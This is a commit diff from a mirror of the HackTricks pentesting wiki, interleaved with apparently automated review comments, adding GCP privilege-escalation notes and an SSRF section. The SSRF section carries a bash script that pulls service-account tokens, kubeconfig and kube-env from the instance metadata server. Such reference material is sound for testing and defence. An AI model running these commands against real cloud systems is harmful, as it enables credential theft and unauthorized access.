mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3008] No subject
This commit is contained in:
parent
19f982fe32
commit
3aea4c400a
4 changed files with 125 additions and 41 deletions
|
@ -497,7 +497,6 @@
|
|||
## Cloud Security
|
||||
|
||||
* [GCP Security](cloud-security/gcp-security/README.md)
|
||||
* [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
|
||||
* [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
|
||||
* [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md)
|
||||
|
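Review bot: the `GCP - Local Privilege Escalation / SSH Pivoting` entry leaves this position and reappears in the next hunk after `GCP - Buckets Enumeration`, so this is a reorder rather than a removal; the target path `cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md` is unchanged, which keeps the `{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}` reference in `gcp-interesting-permissions/README.md` resolving. Confirm that the page is listed once in the summary after the merge and not left in both positions.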
@ -509,6 +508,7 @@
|
|||
* [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md)
|
||||
* [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md)
|
||||
* [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md)
|
||||
* [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
* [Github Security](cloud-security/github-security/README.md)
|
||||
* [Basic Github Information](cloud-security/github-security/basic-github-information.md)
|
||||
* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
|
||||
|
|
|
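Review bot: the moved `GCP - Local Privilege Escalation / SSH Pivoting` entry now sits between `GCP - Buckets Enumeration` and `Github Security`, among the enumeration pages; since the page is about privilege escalation and pivoting rather than enumeration, placing it directly after `GCP - Privesc to other Principals` would keep the privesc material together. The link itself is correct.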
@ -154,6 +154,38 @@ For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-pri
|
|||
|
||||
**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
|
||||
|
||||
## compute
|
||||
|
||||
### compute.projects.setCommonInstanceMetadata
|
||||
|
||||
With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
|
||||
Limitations:
|
||||
|
||||
* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
|
||||
* You will need to be **able to contact the SSH** server to login
|
||||
|
||||
For more information about how to exploit this permission check:
|
||||
|
||||
{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
|
||||
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### compute.instances.setMetadata
|
||||
|
||||
This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
|
||||
|
||||
### compute.instances.setIamPolicy
|
||||
|
||||
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
|
||||
|
||||
### **compute.instances.osLogin**
|
||||
|
||||
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
|
||||
|
||||
### **compute.instances.osAdminLogin**
|
||||
|
||||
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
|
||||
|
||||
## container
|
||||
|
||||
### container.clusters.get
|
||||
|
|
|
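Review bot: the body under `### compute.projects.setCommonInstanceMetadata` says the permission lets you modify the metadata of "an instance", but the permission name is project-scoped, and it is the following `compute.instances.setMetadata` section that is described as "over a specific instances instead to a whole project"; reword the first body to say it edits the project-wide common instance metadata that instances in the project inherit, and fix the grammar in the second ("over a specific instance instead of the whole project", "the same exploits and limitations apply"). It would also help the reader to state next to the two `osLogin` / `osAdminLogin` sections that they only apply when OS Login is enabled and that the metadata SSH-key route above is the alternative, since the page elsewhere presents the two as alternatives an administrator chooses between.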
@ -48,8 +48,6 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
|
|||
* `https://www.googleapis.com/auth/compute`
|
||||
* `https://www.googleapis.com/auth/cloud-platfo`rm
|
||||
|
||||
## **Add SSH keys** 
|
||||
|
||||
### **Add SSH keys to custom metadata**
|
||||
|
||||
**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
|
||||
|
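Review bot: the context line `` `https://www.googleapis.com/auth/cloud-platfo`rm `` closes the code span one character early, so the scope renders as `cloud-platfo` followed by a stray `rm`; since this hunk already touches the surrounding lines, fix it to `` `https://www.googleapis.com/auth/cloud-platform` `` in the same change.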
@ -149,26 +147,7 @@ gcloud compute ssh [INSTANCE NAME]
|
|||
|
||||
This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
|
||||
|
||||
## **Using OS Login**
|
||||
|
||||
[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
|
||||
|
||||
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
|
||||
|
||||
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
|
||||
|
||||
The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
|
||||
|
||||
* **roles/compute.osLogin** (no sudo)
|
||||
* **roles/compute.osAdminLogin** (has sudo)
|
||||
|
||||
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
|
||||
|
||||
If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
|
||||
|
||||
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
|
||||
|
||||
## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
|
||||
### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
|
||||
|
||||
Following the details mentioned in the previous section you can try to compromise more VMs.
|
||||
|
||||
|
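Review bot: `## SSH keys at project level` and `### SSH keys at project level` both carry `id="sshing-around"`, so whichever of the two is the surviving line, the other should go; two headings with the same id in one file make the anchor ambiguous, and a `###` nested directly under a same-named `##` adds nothing. The OS Login paragraphs leaving this hunk reappear later in the file (the `@ -180,6 +159,25 @@` hunk) with the list entries renamed, so check that the `roles/compute.osLogin` / `roles/compute.osAdminLogin` wording is not left behind anywhere else on the page.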
@ -180,6 +159,25 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
|
|||
|
||||
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
|
||||
|
||||
## **Using OS Login**
|
||||
|
||||
****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
|
||||
|
||||
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
|
||||
|
||||
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
|
||||
|
||||
The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
|
||||
|
||||
* **compute.instances.osLogin** (no sudo)
|
||||
* **compute.instances.osAdminLogin** (has sudo)
|
||||
|
||||
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
|
||||
|
||||
If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
|
||||
|
||||
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
|
||||
|
||||
## Search for Keys in the filesystem
|
||||
|
||||
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
|
||||
|
|
|
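Review bot: the list now reads `compute.instances.osLogin` / `compute.instances.osAdminLogin`, which matches the lead sentence ("IAM permissions") better than the `roles/compute.osLogin` form the section had before, but the `****[**OS Login**](...) ****` line carries empty `****` bold markers on both sides of the link that render as literal asterisks outside GitBook; plain `[OS Login](https://cloud.google.com/compute/docs/oslogin/)` is enough. The sentence "If your service account has these permissions. **You can simply run ...**" is split by a full stop; join it as "If your service account has these permissions, you can simply run ...".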
@ -92,21 +92,81 @@ Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACC
|
|||
|
||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
|
||||
Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
||||
|
||||
```
|
||||
http://169.254.169.254/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/
|
||||
http://metadata/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/hostname
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/id
|
||||
http://metadata.google.internal/computeMetadata/v1/project/project-id
|
||||
```
|
||||
* http://169.254.169.254
|
||||
* http://metadata.google.internal
|
||||
* http://metadata
|
||||
|
||||
Google allows recursive pulls
|
||||
Interesting endpoints to extract information:
|
||||
|
||||
```
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
|
||||
```bash
|
||||
# /project
|
||||
## Project name and number
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
|
||||
## Project attributes
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
|
||||
|
||||
# /oslogin
|
||||
## users
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users
|
||||
## groups
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups
|
||||
## security-keys
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys
|
||||
## authorize
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize
|
||||
|
||||
# /instance
|
||||
## Description
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
|
||||
## Hostname
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
|
||||
## ID
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
|
||||
## Image
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
|
||||
## Machine Type
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type
|
||||
## Name
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
|
||||
## Tags
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
|
||||
## Zone
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
|
||||
## Network Interfaces
|
||||
for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
|
||||
echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
|
||||
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
|
||||
echo " Gateway: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
|
||||
echo " DNS: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
|
||||
echo " Network: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
|
||||
echo " ============== "
|
||||
done
|
||||
## Service Accounts
|
||||
for sa in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
|
||||
echo " Name: $sa"
|
||||
echo " Email: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email")
|
||||
echo " Aliases: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
|
||||
echo " Identity: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
|
||||
echo " Scopes: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
|
||||
echo " Token: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
|
||||
echo " ============== "
|
||||
done
|
||||
## K8s Attributtes
|
||||
### Cluster location
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
|
||||
### Cluster name
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
|
||||
### Os-login enabled
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
|
||||
### Kube-env
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env
|
||||
### Kube-labels
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
|
||||
### Kubeconfig
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
|
||||
```
|
||||
|
||||
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
||||
|
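Review bot: the new bash block mixes `curl -H` and `curl -s -f -H` across otherwise identical requests (the `/project` lines and the first few `/instance` lines lack `-s -f`), so a missing attribute prints the metadata server's error body in the middle of the output while the later lines stay silent; use one form throughout. `## K8s Attributtes` is misspelled (`Attributes`). The two `Requires the header ...` sentences at the top say the same thing, so keep only the second, which also lists the base URLs. Finally, the region contains a bare ``` fence before `http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true` and a ```bash fence a few lines later with no close between them; check that the rendered file ends up with exactly one opening and one closing fence after the merge.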
@ -116,12 +176,6 @@ http://metadata.google.internal/computeMetadata/v1beta1/
|
|||
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
```
|
||||
|
||||
Interesting files to pull out:
|
||||
|
||||
* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
|
||||
* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
|
||||
* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
|
||||
|
||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
|
||||
Extract the token
|
||||
|
|
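Review bot: the three `v1beta1` links under "Interesting files to pull out:" are the only place in this file that point at the project-level `ssh-keys` attribute and at `kube-env` with `?alt=json`; the bash block earlier in the file reads the same data through `project/attributes/?recursive=true` and `instance/attributes/kube-env` on `v1` instead, so if this list is being dropped, keep a one-line pointer that the same paths exist under `v1beta1` without the header (the "Beta does NOT require a header atm" sentence above it), otherwise the "Extract the token" step under "Add an SSH key" loses its nearest example of the token endpoint.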